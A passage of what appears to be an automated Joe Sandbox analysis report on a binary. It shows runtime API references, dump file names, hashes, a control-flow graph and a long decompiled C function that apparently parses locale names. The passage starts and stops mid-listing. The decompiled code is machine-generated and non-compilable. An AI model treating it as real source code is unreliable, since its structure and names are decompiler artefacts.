                                                0x00c146c1
                                                0x00c146c1
                                                0x00c146c8
                                                0x00c146d6
                                                0x00c146d7
                                                0x00c146d9
                                                0x00c146e7
                                                0x00c146e7
                                                0x00c146bf

                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00C1465C
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00C14679
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00C1469D
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00C146C8
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00C1473A
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C1478F
                                                • __Getctype.LIBCPMT ref: 00C147A6
                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00C147E6
                                                  • Part of subcall function 00C1CD40: _free.LIBCMT ref: 00C1CD53
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00C14888
                                                • std::_Facet_Register.LIBCPMT ref: 00C1488E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_GetctypeLocinfo_ctorLocinfo_dtorRegister_free
                                                • String ID: bad locale name
                                                • API String ID: 2615381721-1405518554
                                                • Opcode ID: 064cc9c95dbb6dce593cbccb8ad1d21dec446b92e827e3274a84697bdea1344f
                                                • Instruction ID: 4e07549fe7a0a12cd2890d313b672971e54dbd80b91c6fcab7bda335d1c15f0b
                                                • Opcode Fuzzy Hash: 064cc9c95dbb6dce593cbccb8ad1d21dec446b92e827e3274a84697bdea1344f
                                                • Instruction Fuzzy Hash: 9961B4B19047408FD715EF24D881B9BB7E4BF97304F04492DF99997252EB30E988EB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 111 c21c5d-c21c7e call c22fd9 114 c21c84-c21cb8 call c21b99 111->114 115 c21d9b-c21d9e 111->115 118 c21cbb-c21cd0 call c29e63 114->118 121 c21cd6-c21ce3 118->121 122 c21deb-c21e21 call c1d97b 118->122 123 c21ce6-c21cec 121->123 134 c21e23-c21e25 122->134 135 c21e44-c21e60 122->135 125 c21cee-c21cf1 123->125 126 c21d0c-c21d0e 123->126 128 c21cf3-c21cfb 125->128 129 c21d08-c21d0a 125->129 130 c21d11-c21d4b call c21b99 126->130 128->126 132 c21cfd-c21d06 128->132 129->130 130->118 144 c21d51-c21d55 130->144 132->123 132->129 139 c21e37-c21e3f 134->139 140 c21e27-c21e32 call c220e8 134->140 136 c220c0-c220c1 call c21c5d 135->136 137 c21e66-c21e6a 135->137 147 c220c6 136->147 142 c21e70-c21e75 137->142 143 c21fd8-c21fff call c217d3 137->143 146 c220c7-c220d5 call c17193 139->146 140->146 142->143 148 c21e7b-c21e80 142->148 143->146 164 c22005-c2200c 143->164 150 c21d57-c21d5f 144->150 151 c21d9f-c21dae call c22f9f 144->151 147->146 148->143 155 c21e86-c21e9d call c2c319 148->155 157 c21d72-c21d77 150->157 158 c21d61-c21d67 150->158 168 c21db0-c21db6 151->168 169 c21dc1-c21dc6 151->169 175 c21ea3-c21ead 155->175 176 c21fd1-c21fd3 155->176 160 c21d89-c21d97 157->160 161 c21d79-c21d7e 157->161 158->157 165 c21d69-c21d71 call c22f9f 158->165 167 c21d9a 160->167 161->160 166 c21d80-c21d88 call c22f9f 161->166 171 c22012-c22014 164->171 165->157 166->160 167->115 168->169 174 c21db8-c21dc0 call c22f9f 168->174 180 c21dd8-c21de9 169->180 181 c21dc8-c21dcd 169->181 177 c2201a-c2201c 171->177 178 c2209b 171->178 174->169 175->176 185 c21eb3-c21eb9 175->185 176->146 187 c22022-c2202e 177->187 186 c220a1-c220ae 178->186 180->167 181->180 182 c21dcf-c21dd7 call c22f9f 181->182 182->180 185->176 192 c21ebf-c21eca 185->192 186->171 193 c220b4-c220b6 186->193 188 c22063-c22068 187->188 189 c22030-c22034 187->189 197 c2206a-c2206c 188->197 194 c22036-c2204b 189->194 195 c2205d-c22061 189->195 198 c21ed4-c21ee2 call c22f08 192->198 193->136 199 c220b8-c220ba 193->199 194->188 202 c2204d-c2205b 194->202 195->197 203 c2209a 197->203 204 c2206e-c22087 call c220e8 197->204 207 c21f00-c21f0f 198->207 208 c21ee4-c21ee6 198->208 199->136 201 c220bc-c220be 199->201 201->146 202->187 202->195 203->178 212 c22089-c2208c 204->212 213 c2208e-c22098 204->213 207->198 211 c21f11-c21f31 call c2c2c0 207->211 210 c21ee9-c21ef6 208->210 210->210 214 c21ef8-c21efe 210->214 217 c21f33-c21f39 211->217 218 c21f3f-c21f46 211->218 212->178 213->186 214->207 214->211 217->176 217->218 219 c21fa7 218->219 220 c21f48-c21f60 call c29fa3 218->220 221 c21fad-c21fb8 219->221 227 c21f66-c21f6e 220->227 228 c220db-c220e7 call c1d97b 220->228 223 c21fc0-c21fc3 221->223 224 c21fba-c21fbd 221->224 223->155 226 c21fc9-c21fcb 223->226 224->223 226->136 226->176 230 c220d6 call c17902 227->230 231 c21f74-c21f9c call c220e8 227->231 230->228 231->221 236 c21f9e-c21fa5 231->236 236->221
                                                C-Code - Quality: 76%
                                                			E00C21C5D(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                				intOrPtr* _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				intOrPtr _v48;
                                                				signed int _v60;
                                                				char _v276;
                                                				short _v278;
                                                				short _v280;
                                                				char _v448;
                                                				signed int _v452;
                                                				short _v454;
                                                				intOrPtr _v456;
                                                				signed int _v460;
                                                				intOrPtr _v464;
                                                				signed int _v468;
                                                				signed int _v472;
                                                				intOrPtr _v512;
                                                				char _v536;
                                                				intOrPtr _v540;
                                                				signed int _v544;
                                                				intOrPtr _v548;
                                                				signed int _v560;
                                                				char _v708;
                                                				signed int _v712;
                                                				short _v714;
                                                				signed int _v716;
                                                				signed int _v720;
                                                				signed int _v724;
                                                				intOrPtr _v728;
                                                				signed int _v732;
                                                				intOrPtr _v736;
                                                				signed int* _v740;
                                                				signed int _v744;
                                                				signed int _v748;
                                                				signed int _v752;
                                                				char _v824;
                                                				char _v1252;
                                                				char _v1268;
                                                				intOrPtr _v1284;
                                                				signed int _v1288;
                                                				intOrPtr _v1324;
                                                				signed int _v1336;
                                                				void* __ebp;
                                                				signed int _t249;
                                                				signed int _t251;
                                                				void* _t254;
                                                				signed int _t257;
                                                				signed int _t259;
                                                				signed int _t265;
                                                				signed int _t266;
                                                				signed int _t267;
                                                				signed int _t268;
                                                				signed int _t269;
                                                				signed int _t270;
                                                				void* _t272;
                                                				signed int _t273;
                                                				signed int _t274;
                                                				signed int _t275;
                                                				signed int _t277;
                                                				signed int _t280;
                                                				signed int _t287;
                                                				signed int _t288;
                                                				signed int _t290;
                                                				signed int _t291;
                                                				intOrPtr _t292;
                                                				signed int _t295;
                                                				signed int _t297;
                                                				signed int _t298;
                                                				signed int _t301;
                                                				signed int _t303;
                                                				signed int _t306;
                                                				signed int _t307;
                                                				signed int _t309;
                                                				signed int _t310;
                                                				signed int _t326;
                                                				signed int _t328;
                                                				signed int _t330;
                                                				signed int _t334;
                                                				void* _t335;
                                                				signed int _t337;
                                                				void* _t338;
                                                				intOrPtr _t339;
                                                				signed int _t343;
                                                				signed int _t344;
                                                				intOrPtr* _t349;
                                                				signed int _t363;
                                                				signed int _t365;
                                                				void* _t366;
                                                				signed int _t367;
                                                				intOrPtr* _t368;
                                                				signed int _t370;
                                                				void* _t371;
                                                				void* _t375;
                                                				signed int _t379;
                                                				intOrPtr* _t380;
                                                				intOrPtr* _t383;
                                                				void* _t386;
                                                				signed int _t387;
                                                				signed int _t390;
                                                				intOrPtr* _t391;
                                                				char* _t398;
                                                				intOrPtr _t402;
                                                				intOrPtr* _t403;
                                                				signed int _t405;
                                                				signed int _t410;
                                                				signed int _t411;
                                                				intOrPtr* _t415;
                                                				intOrPtr* _t416;
                                                				signed int _t425;
                                                				short _t426;
                                                				signed int _t428;
                                                				intOrPtr _t429;
                                                				void* _t430;
                                                				signed int _t432;
                                                				intOrPtr _t433;
                                                				void* _t434;
                                                				signed int _t435;
                                                				signed int _t438;
                                                				intOrPtr _t444;
                                                				signed int _t445;
                                                				void* _t446;
                                                				signed int _t447;
                                                				signed int _t448;
                                                				void* _t450;
                                                				signed int _t452;
                                                				signed int _t454;
                                                				signed int _t457;
                                                				signed int* _t458;
                                                				short _t459;
                                                				signed int _t461;
                                                				signed int _t462;
                                                				void* _t464;
                                                				void* _t465;
                                                				signed int _t466;
                                                				void* _t467;
                                                				void* _t468;
                                                				signed int _t469;
                                                				void* _t471;
                                                				void* _t472;
                                                				signed int _t484;
                                                
                                                				_t424 = __edx;
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_v12 = 1;
                                                				_t249 = E00C22FD9(0x6a6); // executed
                                                				_t363 = _t249;
                                                				_t250 = 0;
                                                				_pop(_t375);
                                                				if(_t363 == 0) {
                                                					L20:
                                                					return _t250;
                                                				} else {
                                                					_push(__edi);
                                                					 *_t363 = 1;
                                                					_t2 = _t363 + 4; // 0x4
                                                					_t428 = _t2;
                                                					_t444 = _a4;
                                                					 *_t428 = 0;
                                                					_t251 = _t444 + 0x30;
                                                					_push( *_t251);
                                                					_v16 = _t251;
                                                					_push(0xc37548);
                                                					_push( *0xc37484);
                                                					E00C21B99(_t363, _t375, __edx, _t428, _t444, _t428, 0x351, 3);
                                                					_t465 = _t464 + 0x18;
                                                					_v8 = 0xc37484;
                                                					while(1) {
                                                						L2:
                                                						_t254 = E00C29E63(_t428, 0x351, 0xc37544);
                                                						_t466 = _t465 + 0xc;
                                                						if(_t254 != 0) {
                                                							break;
                                                						} else {
                                                							_t8 = _v16 + 0x10; // 0x10
                                                							_t415 = _t8;
                                                							_t343 =  *_v16;
                                                							_v16 = _t415;
                                                							_t416 =  *_t415;
                                                							_v20 = _t416;
                                                							goto L4;
                                                						}
                                                						while(1) {
                                                							L4:
                                                							_t424 =  *_t343;
                                                							if(_t424 !=  *_t416) {
                                                								break;
                                                							}
                                                							if(_t424 == 0) {
                                                								L8:
                                                								_t344 = 0;
                                                							} else {
                                                								_t424 =  *((intOrPtr*)(_t343 + 2));
                                                								if(_t424 !=  *((intOrPtr*)(_t416 + 2))) {
                                                									break;
                                                								} else {
                                                									_t343 = _t343 + 4;
                                                									_t416 = _t416 + 4;
                                                									if(_t424 != 0) {
                                                										continue;
                                                									} else {
                                                										goto L8;
                                                									}
                                                								}
                                                							}
                                                							L10:
                                                							_push(_v20);
                                                							_push(0xc37548);
                                                							asm("sbb eax, eax");
                                                							_v12 = _v12 &  !( ~_t344);
                                                							_t349 = _v8 + 0xc;
                                                							_v8 = _t349;
                                                							_push( *_t349);
                                                							E00C21B99(_t363, _t416, _t424, _t428, _t444, _t428, 0x351, 3);
                                                							_t465 = _t466 + 0x18;
                                                							if(_v8 < 0xc374b4) {
                                                								goto L2;
                                                							} else {
                                                								if(_v12 != 0) {
                                                									E00C22F9F(_t363);
                                                									_t435 = _t428 | 0xffffffff;
                                                									__eflags =  *(_t444 + 0x28);
                                                									if(__eflags != 0) {
                                                										asm("lock xadd [ecx], eax");
                                                										if(__eflags == 0) {
                                                											E00C22F9F( *(_t444 + 0x28));
                                                										}
                                                									}
                                                									__eflags =  *(_t444 + 0x24);
                                                									if( *(_t444 + 0x24) != 0) {
                                                										asm("lock xadd [eax], edi");
                                                										__eflags = _t435 == 1;
                                                										if(_t435 == 1) {
                                                											E00C22F9F( *(_t444 + 0x24));
                                                										}
                                                									}
                                                									 *(_t444 + 0x24) = 0;
                                                									 *(_t444 + 0x1c) = 0;
                                                									 *(_t444 + 0x28) = 0;
                                                									 *((intOrPtr*)(_t444 + 0x20)) = 0;
                                                									_t250 =  *((intOrPtr*)(_t444 + 0x40));
                                                								} else {
                                                									_t438 = _t428 | 0xffffffff;
                                                									_t484 =  *(_t444 + 0x28);
                                                									if(_t484 != 0) {
                                                										asm("lock xadd [ecx], eax");
                                                										if(_t484 == 0) {
                                                											E00C22F9F( *(_t444 + 0x28));
                                                										}
                                                									}
                                                									if( *(_t444 + 0x24) != 0) {
                                                										asm("lock xadd [eax], edi");
                                                										if(_t438 == 1) {
                                                											E00C22F9F( *(_t444 + 0x24));
                                                										}
                                                									}
                                                									 *(_t444 + 0x24) =  *(_t444 + 0x24) & 0x00000000;
                                                									_t28 = _t363 + 4; // 0x4
                                                									_t250 = _t28;
                                                									 *(_t444 + 0x1c) =  *(_t444 + 0x1c) & 0x00000000;
                                                									 *(_t444 + 0x28) = _t363;
                                                									 *((intOrPtr*)(_t444 + 0x20)) = _t250;
                                                								}
                                                								goto L20;
                                                							}
                                                							goto L134;
                                                						}
                                                						asm("sbb eax, eax");
                                                						_t344 = _t343 | 0x00000001;
                                                						__eflags = _t344;
                                                						goto L10;
                                                					}
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					E00C1D97B();
                                                					asm("int3");
                                                					_t461 = _t466;
                                                					_t467 = _t466 - 0x1d0;
                                                					_t257 =  *0xc42014; // 0x4fdfcf70
                                                					_v60 = _t257 ^ _t461;
                                                					_t259 = _v44;
                                                					_push(_t363);
                                                					_push(_t444);
                                                					_t445 = _v40;
                                                					_push(_t428);
                                                					_t429 = _v48;
                                                					_v512 = _t429;
                                                					__eflags = _t259;
                                                					if(_t259 == 0) {
                                                						_v460 = 1;
                                                						_v472 = 0;
                                                						_t365 = 0;
                                                						_v452 = 0;
                                                						__eflags = _t445;
                                                						if(__eflags == 0) {
                                                							L79:
                                                							_t259 = E00C21C5D(_t365, _t424, _t429, _t445, __eflags, _t429); // executed
                                                							goto L80;
                                                						} else {
                                                							__eflags =  *_t445 - 0x4c;
                                                							if( *_t445 != 0x4c) {
                                                								L59:
                                                								_t259 = E00C217D3(_t365, _t424, _t429, _t445, _t445,  &_v276, 0x83,  &_v448, 0x55,  &_v468);
                                                								_t468 = _t467 + 0x18;
                                                								__eflags = _t259;
                                                								if(_t259 != 0) {
                                                									_t379 = 0;
                                                									__eflags = 0;
                                                									_t425 = _t429 + 0x20;
                                                									_t447 = 0;
                                                									_v452 = _t425;
                                                									do {
                                                										__eflags = _t447;
                                                										if(_t447 == 0) {
                                                											L74:
                                                											_t265 = _v460;
                                                										} else {
                                                											_t380 =  *_t425;
                                                											_t266 =  &_v276;
                                                											while(1) {
                                                												__eflags =  *_t266 -  *_t380;
                                                												_t429 = _v464;
                                                												if( *_t266 !=  *_t380) {
                                                													break;
                                                												}
                                                												__eflags =  *_t266;
                                                												if( *_t266 == 0) {
                                                													L67:
                                                													_t379 = 0;
                                                													_t267 = 0;
                                                												} else {
                                                													_t426 =  *((intOrPtr*)(_t266 + 2));
                                                													__eflags = _t426 -  *((intOrPtr*)(_t380 + 2));
                                                													_v454 = _t426;
                                                													_t425 = _v452;
                                                													if(_t426 !=  *((intOrPtr*)(_t380 + 2))) {
                                                														break;
                                                													} else {
                                                														_t266 = _t266 + 4;
                                                														_t380 = _t380 + 4;
                                                														__eflags = _v454;
                                                														if(_v454 != 0) {
                                                															continue;
                                                														} else {
                                                															goto L67;
                                                														}
                                                													}
                                                												}
                                                												L69:
                                                												__eflags = _t267;
                                                												if(_t267 == 0) {
                                                													_t365 = _t365 + 1;
                                                													__eflags = _t365;
                                                													goto L74;
                                                												} else {
                                                													_t268 =  &_v276;
                                                													_push(_t268);
                                                													_push(_t447);
                                                													_push(_t429);
                                                													L83();
                                                													_t425 = _v452;
                                                													_t468 = _t468 + 0xc;
                                                													__eflags = _t268;
                                                													if(_t268 == 0) {
                                                														_t379 = 0;
                                                														_t265 = 0;
                                                														_v460 = 0;
                                                													} else {
                                                														_t365 = _t365 + 1;
                                                														_t379 = 0;
                                                														goto L74;
                                                													}
                                                												}
                                                												goto L75;
                                                											}
                                                											asm("sbb eax, eax");
                                                											_t267 = _t266 | 0x00000001;
                                                											_t379 = 0;
                                                											__eflags = 0;
                                                											goto L69;
                                                										}
                                                										L75:
                                                										_t447 = _t447 + 1;
                                                										_t425 = _t425 + 0x10;
                                                										_v452 = _t425;
                                                										__eflags = _t447 - 5;
                                                									} while (_t447 <= 5);
                                                									__eflags = _t265;
                                                									if(__eflags != 0) {
                                                										goto L79;
                                                									} else {
                                                										__eflags = _t365;
                                                										if(__eflags != 0) {
                                                											goto L79;
                                                										} else {
                                                											_t259 = _t379;
                                                										}
                                                									}
                                                								}
                                                								goto L80;
                                                							} else {
                                                								__eflags =  *(_t445 + 2) - 0x43;
                                                								if( *(_t445 + 2) != 0x43) {
                                                									goto L59;
                                                								} else {
                                                									__eflags =  *((short*)(_t445 + 4)) - 0x5f;
                                                									if( *((short*)(_t445 + 4)) != 0x5f) {
                                                										goto L59;
                                                									} else {
                                                										while(1) {
                                                											_t269 = E00C2C319(_t445, 0xc3753c);
                                                											_t367 = _t269;
                                                											_v468 = _t367;
                                                											_pop(_t382);
                                                											__eflags = _t367;
                                                											if(_t367 == 0) {
                                                												break;
                                                											}
                                                											_t270 = _t269 - _t445;
                                                											__eflags = _t270;
                                                											_v460 = _t270 >> 1;
                                                											if(_t270 == 0) {
                                                												break;
                                                											} else {
                                                												_t272 = 0x3b;
                                                												__eflags =  *_t367 - _t272;
                                                												if( *_t367 == _t272) {
                                                													break;
                                                												} else {
                                                													_t432 = _v460;
                                                													_t368 = 0xc37484;
                                                													_v456 = 1;
                                                													do {
                                                														_t273 = E00C22F08( *_t368, _t445, _t432);
                                                														_t467 = _t467 + 0xc;
                                                														__eflags = _t273;
                                                														if(_t273 != 0) {
                                                															goto L45;
                                                														} else {
                                                															_t383 =  *_t368;
                                                															_t424 = _t383 + 2;
                                                															do {
                                                																_t339 =  *_t383;
                                                																_t383 = _t383 + 2;
                                                																__eflags = _t339 - _v472;
                                                															} while (_t339 != _v472);
                                                															_t382 = _t383 - _t424 >> 1;
                                                															__eflags = _t432 - _t383 - _t424 >> 1;
                                                															if(_t432 != _t383 - _t424 >> 1) {
                                                																goto L45;
                                                															}
                                                														}
                                                														break;
                                                														L45:
                                                														_v456 = _v456 + 1;
                                                														_t368 = _t368 + 0xc;
                                                														__eflags = _t368 - 0xc374b4;
                                                													} while (_t368 <= 0xc374b4);
                                                													_t365 = _v468 + 2;
                                                													_t274 = E00C2C2C0(_t382, _t365, 0xc37544);
                                                													_t429 = _v464;
                                                													_t448 = _t274;
                                                													_pop(_t386);
                                                													__eflags = _t448;
                                                													if(_t448 != 0) {
                                                														L48:
                                                														__eflags = _v456 - 5;
                                                														if(_v456 > 5) {
                                                															_t387 = _v452;
                                                															goto L54;
                                                														} else {
                                                															_push(_t448);
                                                															_t277 = E00C29FA3( &_v276, 0x83, _t365);
                                                															_t469 = _t467 + 0x10;
                                                															__eflags = _t277;
                                                															if(_t277 != 0) {
                                                																L82:
                                                																_push(0);
                                                																_push(0);
                                                																_push(0);
                                                																_push(0);
                                                																_push(0);
                                                																E00C1D97B();
                                                																asm("int3");
                                                																_push(_t461);
                                                																_t462 = _t469;
                                                																_t280 =  *0xc42014; // 0x4fdfcf70
                                                																_v560 = _t280 ^ _t462;
                                                																_push(_t365);
                                                																_t370 = _v544;
                                                																_push(_t448);
                                                																_push(_t429);
                                                																_t433 = _v548;
                                                																_v1288 = _t370;
                                                																_v1284 = E00C23663(_t386, _t424) + 0x278;
                                                																_t287 = E00C217D3(_t370, _t424, _t433, _v540, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1268);
                                                																_t471 = _t469 - 0x2e4 + 0x18;
                                                																__eflags = _t287;
                                                																if(_t287 == 0) {
                                                																	L122:
                                                																	_t288 = 0;
                                                																	__eflags = 0;
                                                																	goto L123;
                                                																} else {
                                                																	_t103 = _t370 + 2; // 0x6
                                                																	_t452 = _t103 << 4;
                                                																	__eflags = _t452;
                                                																	_t290 =  &_v280;
                                                																	_v720 = _t452;
                                                																	_t424 =  *(_t452 + _t433);
                                                																	_t390 = _t424;
                                                																	while(1) {
                                                																		_v712 = _v712 & 0x00000000;
                                                																		__eflags =  *_t290 -  *_t390;
                                                																		_t454 = _v720;
                                                																		if( *_t290 !=  *_t390) {
                                                																			break;
                                                																		}
                                                																		__eflags =  *_t290;
                                                																		if( *_t290 == 0) {
                                                																			L89:
                                                																			_t291 = _v712;
                                                																		} else {
                                                																			_t459 =  *((intOrPtr*)(_t290 + 2));
                                                																			__eflags = _t459 -  *((intOrPtr*)(_t390 + 2));
                                                																			_v714 = _t459;
                                                																			_t454 = _v720;
                                                																			if(_t459 !=  *((intOrPtr*)(_t390 + 2))) {
                                                																				break;
                                                																			} else {
                                                																				_t290 = _t290 + 4;
                                                																				_t390 = _t390 + 4;
                                                																				__eflags = _v714;
                                                																				if(_v714 != 0) {
                                                																					continue;
                                                																				} else {
                                                																					goto L89;
                                                																				}
                                                																			}
                                                																		}
                                                																		L91:
                                                																		__eflags = _t291;
                                                																		if(_t291 != 0) {
                                                																			_t391 =  &_v280;
                                                																			_t424 = _t391 + 2;
                                                																			do {
                                                																				_t292 =  *_t391;
                                                																				_t391 = _t391 + 2;
                                                																				__eflags = _t292 - _v712;
                                                																			} while (_t292 != _v712);
                                                																			_v716 = (_t391 - _t424 >> 1) + 1;
                                                																			_t295 = E00C22FD9(4 + ((_t391 - _t424 >> 1) + 1) * 2);
                                                																			_v732 = _t295;
                                                																			__eflags = _t295;
                                                																			if(_t295 == 0) {
                                                																				goto L122;
                                                																			} else {
                                                																				_v728 =  *((intOrPtr*)(_t454 + _t433));
                                                																				_v748 =  *(_t433 + 0xa0 + _t370 * 4);
                                                																				_v752 =  *(_t433 + 8);
                                                																				_t398 =  &_v280;
                                                																				_v736 = _t295 + 4;
                                                																				_t297 = E00C28361(_t295 + 4, _v716, _t398);
                                                																				_t472 = _t471 + 0xc;
                                                																				__eflags = _t297;
                                                																				if(_t297 != 0) {
                                                																					_t298 = _v712;
                                                																					_push(_t298);
                                                																					_push(_t298);
                                                																					_push(_t298);
                                                																					_push(_t298);
                                                																					_push(_t298);
                                                																					E00C1D97B();
                                                																					asm("int3");
                                                																					_push(_t462);
                                                																					_push(_t398);
                                                																					_v1336 = _v1336 & 0x00000000;
                                                																					_t301 = E00C25763(_v1324, 0x20001004,  &_v1336, 2);
                                                																					__eflags = _t301;
                                                																					if(_t301 == 0) {
                                                																						L132:
                                                																						return 0xfde9;
                                                																					}
                                                																					_t303 = _v20;
                                                																					__eflags = _t303;
                                                																					if(_t303 == 0) {
                                                																						goto L132;
                                                																					}
                                                																					return _t303;
                                                																				} else {
                                                																					__eflags = _v280 - 0x43;
                                                																					 *((intOrPtr*)(_t454 + _t433)) = _v736;
                                                																					if(_v280 != 0x43) {
                                                																						L100:
                                                																						_t306 = E00C214F0(_t370, _t433,  &_v708);
                                                																						_t424 = _v712;
                                                																					} else {
                                                																						__eflags = _v278;
                                                																						if(_v278 != 0) {
                                                																							goto L100;
                                                																						} else {
                                                																							_t424 = _v712;
                                                																							_t306 = _t424;
                                                																						}
                                                																					}
                                                																					 *(_t433 + 0xa0 + _t370 * 4) = _t306;
                                                																					__eflags = _t370 - 2;
                                                																					if(_t370 != 2) {
                                                																						__eflags = _t370 - 1;
                                                																						if(_t370 != 1) {
                                                																							__eflags = _t370 - 5;
                                                																							if(_t370 == 5) {
                                                																								 *((intOrPtr*)(_t433 + 0x14)) = _v724;
                                                																							}
                                                																						} else {
                                                																							 *((intOrPtr*)(_t433 + 0x10)) = _v724;
                                                																						}
                                                																					} else {
                                                																						_t458 = _v740;
                                                																						 *(_t433 + 8) = _v724;
                                                																						_v716 = _t458[8];
                                                																						_t410 = _t458[9];
                                                																						_v724 = _t410;
                                                																						while(1) {
                                                																							__eflags =  *(_t433 + 8) -  *(_t458 + _t424 * 8);
                                                																							if( *(_t433 + 8) ==  *(_t458 + _t424 * 8)) {
                                                																								break;
                                                																							}
                                                																							_t334 =  *(_t458 + _t424 * 8);
                                                																							_t410 =  *(_t458 + 4 + _t424 * 8);
                                                																							 *(_t458 + _t424 * 8) = _v716;
                                                																							 *(_t458 + 4 + _t424 * 8) = _v724;
                                                																							_t424 = _t424 + 1;
                                                																							_t370 = _v744;
                                                																							_v716 = _t334;
                                                																							_v724 = _t410;
                                                																							__eflags = _t424 - 5;
                                                																							if(_t424 < 5) {
                                                																								continue;
                                                																							} else {
                                                																							}
                                                																							L108:
                                                																							__eflags = _t424 - 5;
                                                																							if(__eflags == 0) {
                                                																								_t326 = E00C2802B(__eflags, _v712, 1, 0xc373f8, 0x7f,  &_v536,  *(_t433 + 8), 1);
                                                																								_t472 = _t472 + 0x1c;
                                                																								__eflags = _t326;
                                                																								if(_t326 == 0) {
                                                																									_t411 = _v712;
                                                																								} else {
                                                																									_t328 = _v712;
                                                																									do {
                                                																										 *(_t462 + _t328 * 2 - 0x20c) =  *(_t462 + _t328 * 2 - 0x20c) & 0x000001ff;
                                                																										_t328 = _t328 + 1;
                                                																										__eflags = _t328 - 0x7f;
                                                																									} while (_t328 < 0x7f);
                                                																									_t330 = E00C18D10( &_v536,  *0xc42184, 0xfe);
                                                																									_t472 = _t472 + 0xc;
                                                																									__eflags = _t330;
                                                																									_t411 = 0 | _t330 == 0x00000000;
                                                																								}
                                                																								_t458[1] = _t411;
                                                																								 *_t458 =  *(_t433 + 8);
                                                																							}
                                                																							 *(_t433 + 0x18) = _t458[1];
                                                																							goto L120;
                                                																						}
                                                																						__eflags = _t424;
                                                																						if(_t424 != 0) {
                                                																							 *_t458 =  *(_t458 + _t424 * 8);
                                                																							_t458[1] =  *(_t458 + 4 + _t424 * 8);
                                                																							 *(_t458 + _t424 * 8) = _v716;
                                                																							 *(_t458 + 4 + _t424 * 8) = _t410;
                                                																						}
                                                																						goto L108;
                                                																					}
                                                																					L120:
                                                																					_t307 = _t370 * 0xc;
                                                																					_t204 = _t307 + 0xc37480; // 0xc16870
                                                																					 *0xc34138(_t433);
                                                																					_t309 =  *((intOrPtr*)( *_t204))();
                                                																					_t402 = _v728;
                                                																					__eflags = _t309;
                                                																					if(_t309 == 0) {
                                                																						__eflags = _t402 - 0xc42258;
                                                																						if(_t402 == 0xc42258) {
                                                																							L127:
                                                																							_t310 = _v720;
                                                																						} else {
                                                																							_t457 = _t370 + _t370;
                                                																							__eflags = _t457;
                                                																							asm("lock xadd [eax], ecx");
                                                																							if(_t457 != 0) {
                                                																								goto L127;
                                                																							} else {
                                                																								E00C22F9F( *((intOrPtr*)(_t433 + 0x28 + _t457 * 8)));
                                                																								E00C22F9F( *((intOrPtr*)(_t433 + 0x24 + _t457 * 8)));
                                                																								E00C22F9F( *(_t433 + 0xa0 + _t370 * 4));
                                                																								_t310 = _v720;
                                                																								_t405 = _v712;
                                                																								 *(_t310 + _t433) = _t405;
                                                																								 *(_t433 + 0xa0 + _t370 * 4) = _t405;
                                                																							}
                                                																						}
                                                																						_t403 = _v732;
                                                																						 *_t403 = 1;
                                                																						_t288 =  *(_t310 + _t433);
                                                																						 *((intOrPtr*)(_t433 + 0x28 + (_t370 + _t370) * 8)) = _t403;
                                                																					} else {
                                                																						 *((intOrPtr*)(_v720 + _t433)) = _t402;
                                                																						E00C22F9F( *(_t433 + 0xa0 + _t370 * 4));
                                                																						 *(_t433 + 0xa0 + _t370 * 4) = _v748;
                                                																						E00C22F9F(_v732);
                                                																						 *(_t433 + 8) = _v752;
                                                																						goto L122;
                                                																					}
                                                																					goto L123;
                                                																				}
                                                																			}
                                                																		} else {
                                                																			_t288 = _t424;
                                                																			L123:
                                                																			_pop(_t434);
                                                																			_pop(_t450);
                                                																			__eflags = _v16 ^ _t462;
                                                																			_pop(_t371);
                                                																			return E00C17193(_t288, _t371, _v16 ^ _t462, _t424, _t434, _t450);
                                                																		}
                                                																		goto L134;
                                                																	}
                                                																	asm("sbb eax, eax");
                                                																	_t291 = _t290 | 0x00000001;
                                                																	__eflags = _t291;
                                                																	goto L91;
                                                																}
                                                															} else {
                                                																_t335 = _t448 + _t448;
                                                																__eflags = _t335 - 0x106;
                                                																if(_t335 >= 0x106) {
                                                																	E00C17902();
                                                																	goto L82;
                                                																} else {
                                                																	 *((short*)(_t461 + _t335 - 0x10c)) = 0;
                                                																	_t337 =  &_v276;
                                                																	_push(_t337);
                                                																	_push(_v456);
                                                																	_push(_t429);
                                                																	L83();
                                                																	_t387 = _v452;
                                                																	_t467 = _t469 + 0xc;
                                                																	__eflags = _t337;
                                                																	if(_t337 != 0) {
                                                																		_t387 = _t387 + 1;
                                                																		_v452 = _t387;
                                                																	}
                                                																	L54:
                                                																	_t445 = _t365 + _t448 * 2;
                                                																	_t275 =  *_t445 & 0x0000ffff;
                                                																	_t424 = _t275;
                                                																	__eflags = _t275;
